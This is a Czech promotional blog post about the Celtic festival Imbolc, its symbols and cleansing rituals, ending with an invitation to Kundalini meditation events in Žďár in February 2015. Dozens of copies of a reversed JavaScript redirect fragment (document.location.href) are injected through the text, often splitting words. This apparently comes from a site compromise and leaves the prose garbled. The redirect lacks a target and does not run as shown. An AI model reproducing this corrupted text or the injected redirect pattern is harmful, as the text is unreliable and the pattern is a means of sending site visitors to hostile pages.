svátek naděje
Rainbow page separator

PR: Svátek naděje

Úterý, 27. ledna 2015

Naši předkové slavili svátky spjaté s přírodou, s koloběhem roku. I dnes můžeme využít ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to svátky jako příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost k zastavení se, uvědomění si přírodních zákoni[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostí a zamyšlení, jak můžeme ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zákoni[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti promítnout symbolicky do našeho života.

Brzy nastane období, které začíná 1.2. keltským svátkem Imbolc. Je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to svátek naděje předznačující pozvolné probouzení země ze zimního spánku. Hluboko v zemi pokryté sněhem se probouzejí semínka, začínají se rodit jehňata. Mléko krav a ovcí bylo pro naše předky čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to důležitým zdrojem obživy po dlouhé zimě, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to je mléko jedním z hlavních symbolů pro ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to čas. Dalšími symboly například jsou: bílá a stříbrná barva (nevinnost a léčení), sněženky (první jarní kvítka), labuť (nevinnost, čis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tota, život, věrnost), had (regenerace, léčení, kreativita, znovuzrození), …

Svátek bývá označován i jako svátek světla či ohně, bývaly zapalovány svíčky a ohýnky mající očistný a ochranný charakter. To[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to období bylo zasvěcené panenské bohyni Brigid, bohyni nevinnosti, léčení a inspirace, patronce kovářů a opuštěných lidí. Té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bohyni jsou čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zasvěceny studny a léčivé prameny.

V [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to období byly vykonávány rituály očisty, ať už symbolické (rozloučení se se starými zátěžemi a zraněními) či na fyzické a materiální rovině (koupel, úklid domu, vyhození starých věcí, …). I v dnešní době můžeme tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to způsobem vs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupit do nadcházejících únorových dní a také se zamyslet, co nového bychom chtěli, aby se probudilo, co chceme ve svém životě přivítat. Můžeme také požádat o pomoc při léčení, o inspiraci, vnést symbolicky světlo do našeho srdce, života, domova …

Jedním z možných způsobů symbolické očisty či zbavení se starých zátěží a problémů a přivítání nových nadějí je například využití meditace Kundalini, při níž můžete navíc získat i hodně nové energie. Chcete-li vyzkoušet, jak taková meditace funguje, jste srdečně zváni 2.2. nebo 23.2.2015 do DK Žďár do DANU – místa pro sebepoznávání a meditaci.

Více na http://kvet-zivota.webnode.cz/kalendar-akci/